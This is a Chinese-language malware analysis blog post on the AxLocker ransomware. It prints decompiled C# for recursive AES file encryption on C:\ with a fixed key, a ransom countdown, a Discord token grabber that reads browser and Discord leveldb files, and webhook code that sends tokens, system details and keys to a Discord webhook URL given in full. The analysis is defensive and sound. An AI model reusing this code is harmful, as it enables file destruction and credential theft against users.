AxLocker新型勒索軟件分析
VSole2022-12-02 06:44:40
瀏覽安全客時發現新出現了三款惡意軟件,分別是AxLocker, OctoCrypt, Alice,本文分析其中的AxLocker,AXLocker勒索軟件以一種相當典型的方式運行,在勒索受害者之前,針對某些帶有AES加密的文件擴展名。
初步分析
是.NET程序,并且有GUI界面
使用dnspy加載,進入到主函數
private static void Main()
{
Program.hidefile();
Program.startencryption();
Program.show();
}
程序寫的很清晰,竟然沒有混淆,應該是剛出來還沒有完善版本
程序首先隱藏自身
private static void hidefile()
{
File.SetAttributes(Application.ExecutablePath, FileAttributes.Hidden);
}
然后加密文件并展示提示
加密行為分析
加密C盤下的所有文件
public static void startencryption()
{
string targetDirectory = "C:\\";
Program.ProcessDirectory(targetDirectory, 1, "");
}
雖然看上去只加密C盤文件有點離譜,但是看過了我妹的C盤紅色其它盤空的我也覺得正常。畢竟這里面有下載、文檔等重要的數據文件,很多社交軟件聊天記錄、軟件數據也存儲在這里
然后處理文件
public static void ProcessDirectory(string targetDirectory, int action, string password)
{
IEnumerable<string> enumerable = from file in Directory.EnumerateFiles(targetDirectory, "*.*")
where Program.extensionsToEncrypt.Any((string x) => file.EndsWith(x, StringComparison.OrdinalIgnoreCase))
select file; // 忽略大小寫比對文件后綴
foreach (string fileName in enumerable)
{
Program.ProcessFile(fileName, action, password);
}
string[] directories = Directory.GetDirectories(targetDirectory);
foreach (string text in directories)
{
try
{
bool flag = !text.Contains("All Users\\Microsoft\\") && !text.Contains("$Recycle.Bin") && !text.Contains("C:\\Windows") && !text.Contains("C:\\Program Files") && !text.Contains("Temporary Internet Files") && !text.Contains("AppData\\") && !text.Contains("\\axlockerkey\\") && !text.Contains("C:\\ProgramData\\") && !text.Contains("\\Axlocker-data\\") && !text.Contains("\\AXLOCKER\\");
if (flag)
{
Program.ProcessDirectory(text, action, password);
}
}
catch
{
}
}
首先根據后綴名過濾掉一些文件,后綴名為
"7z","rar","zip","m3u","m4a","mp3","wma","ogg","wav","sqlite","sqlite3","img","nrg","tc","doc","docx","docm","odt","rtf","wpd","wps","csv","key","pdf","pps","ppt","pptm","pptx","ps","psd","vcf","xlr","xls","xlsx","xlsm","ods","odp","indd","dwg","dxf","kml","kmz","gpx","cad","wmf","txt","3fr","ari","arw","bay","bmp","cr2","crw","cxi","dcr","dng","eip","erf","fff","gif","iiq","j6i","k25","kdc","mef","mfw","mos","mrw","nef","nrw","orf","pef","png","raf","raw","rw2","rwl","rwz","sr2","srf","srw","x3f","jpg","jpeg","tga","tiff","tif","ai","3g2","3gp","asf","avi","flv","m4v","mkv","mov","mp4","mpg","rm","swf","vob","wmv"
然后需要判斷文件是否非空
public static bool extension(string fileName)
{
byte[] bytes = Encoding.ASCII.GetBytes(fileName);
byte[] second = File.ReadAllBytes(fileName).Take(0).ToArray<byte>();
bool flag = bytes.SequenceEqual(second);
bool result;
if (flag)
{
Program.count++;
Program.encryptedFiles.Add(fileName);
result = true;
}
else
{
result = false;
}
return flag;}
最后來個加密
public static void EncryptFile(string fileUnencrypted)
{
byte[] array = Encoding.UTF8.GetBytes(Program.password);
array = SHA256.Create().ComputeHash(array);
byte[] bytesToBeEncrypted = File.ReadAllBytes(fileUnencrypted);
byte[] array2 = Program.AES_Encrypt(bytesToBeEncrypted, array);
FileStream fileStream = File.Open(fileUnencrypted, FileMode.Open);
fileStream.SetLength(0L);
fileStream.Close();
using (FileStream fileStream2 = new FileStream(fileUnencrypted, FileMode.Append))
{
bool canWrite = fileStream2.CanWrite;
if (canWrite)
{
byte[] bytes = Encoding.UTF8.GetBytes("");
fileStream2.Write(bytes, 0, bytes.Length);
fileStream2.Write(array2, 0, array2.Length);
Console.WriteLine("Encrypted: " + fileUnencrypted);
Program.count++;
Program.encryptedFiles.Add(fileUnencrypted);
}
}
}
通過FileStream.SetLength清空文件,然后寫入AES加密后的文件內容。AES加密的key是固定的,為WnZr4u7xh60A2W4Rz的sha256值。并且加密過程中還會統計加密的文件列表
至此加密過程就完成了,接下來展示勒索信息和竊取discord憑證
展示勒索信息分析
private static void show()
{
bool flag = File.Exists("C:\\\\Windows\\\\AppMon.txt");
if (flag)
{
MessageBox.Show("ERROR, Private key was deleted.");
Environment.Exit(-2);
}
else
{
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
Application.Run(new AXLOCKER());
}
}
首先是判斷AppMon.txt是否存在,如果不存在則展示勒索信息。應該是關機之后再次開機,就會展示私鑰丟失
然后展示一個計時器,用于心理威脅
private void Timer1_Tick(object sender, EventArgs e)
{
bool flag = this.delay >= 0;
if (flag)
{
TimeSpan timeSpan = TimeSpan.FromSeconds((double)(--this.delay));
this.lblTime.Text = timeSpan.ToString("dd\\:hh\\:mm\\:ss");
}
else
{
File.Delete("C:\\\\Windows\\\\winlog.txt");
}
}
然后創建了一個AppMon.txt
base.MinimizeBox = false;
base.MaximizeBox = false;
StreamWriter streamWriter = new StreamWriter("C:\\\\Windows\\\\AppMon.txt");
streamWriter.Write("ERROR, Private key was deleted.");
streamWriter.Close();
竊取信息分析
程序會利用一個Grabber類進行信息的竊取
public static List<string> Grab()
{
Grabber.Scan();
List<string> list = new List<string>();
foreach (string text in Grabber.target)
{
bool flag = Directory.Exists(text);
if (flag)
{
string path = text + "\\Local Storage\\leveldb";
DirectoryInfo directoryInfo = new DirectoryInfo(path);
foreach (FileInfo fileInfo in directoryInfo.GetFiles("*.ldb"))
{
string input = fileInfo.OpenText().ReadToEnd();
foreach (object obj in Regex.Matches(input, "[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27}"))
{
Match match = (Match)obj;
list.Add(match.Value);
}
foreach (object obj2 in Regex.Matches(input, "mfa\\.[\\w-]{84}"))
{
Match match2 = (Match)obj2;
list.Add(match2.Value);
}
}
}
}
return list;
}
并且會利用正則表達式竊取有關信息
竊取的信息列表如下
private static void Scan()
{
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
string folderPath2 = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData);
Grabber.target.Add(folderPath + "\\Discord");
Grabber.target.Add(folderPath + "\\discordcanary");
Grabber.target.Add(folderPath + "\\discordptb");
Grabber.target.Add(folderPath + "\\\\Opera Software\\Opera Stable");
Grabber.target.Add(folderPath2 + "\\Google\\Chrome\\User Data\\Default");
Grabber.target.Add(folderPath2 + "\\BraveSoftware\\Brave-Browser\\User Data\\Default");
Grabber.target.Add(folderPath2 + "\\Yandex\\YandexBrowser\\User Data\\Default");
}
包括Discord,Opera,Chrome,Yandex,Brave等軟件的數據會被竊取。但是只竊取了ldb文件內容
然后會通過webhook發送
Webhook webhook2 = new Webhook(AXLOCKER.WEBHOOK);
webhook2.Send(string.Concat(new string[]
{
"**Program executed** ```Status: Active PC Name: ",
details2[0],
"User: ",
details2[1],
"UUID: ",
identifier2,
"IP Address: ",
ip2,
"```"
}));
webhook2.Send(string.Concat(new string[]
{
"```Decryption Key: ",
text9,
"User ID: ",
text7,
"```"
}));
webhook2.Send("```Tokens:" + text10 + "```");
目標地址為https[:]//discord.com/api/webhooks/1039930467614478378/N2J80EuPMXSWuIBpizgDJ-75CB6gzTyFE72NQ0DJimbA7xriJVmtb14gUP3VCBBZ0A
同時發送的還有其它用戶信息
List<string> details = User.GetDetails(); string identifier = User.GetIdentifier(); string ip = User.GetIP();
最后確實保存了一個私鑰,但是似乎沒用
using (MD5CryptoServiceProvider md5CryptoServiceProvider2 = new MD5CryptoServiceProvider())
{
byte[] key2 = md5CryptoServiceProvider2.ComputeHash(Encoding.UTF8.GetBytes(this.hash));
using (TripleDESCryptoServiceProvider tripleDESCryptoServiceProvider2 = new TripleDESCryptoServiceProvider
{
Key = key2,
Mode = CipherMode.ECB,
Padding = PaddingMode.PKCS7
})
{
ICryptoTransform cryptoTransform2 = tripleDESCryptoServiceProvider2.CreateEncryptor();
byte[] array6 = cryptoTransform2.TransformFinalBlock(bytes2, 0, bytes2.Length);
string value2 = Convert.ToBase64String(array6, 0, array6.Length);
StreamWriter streamWriter3 = new StreamWriter("C:\\\\Windows\\\\winlog.txt");
streamWriter3.Write(value2);
streamWriter3.Close();
this.timer1.Start();
base.Show();
webhook2.Send(string.Format("```Files encrypted, file count: {0}```", Program.count));}}
總結
這個勒索病毒似乎還處于初級階段,很多內容不夠成熟,例如竊取的信息、加密方式、加密密鑰保存,后續可能會有變種。
如果感染,使用程序內包含的密鑰AES解密就可以
VSole
網絡安全專家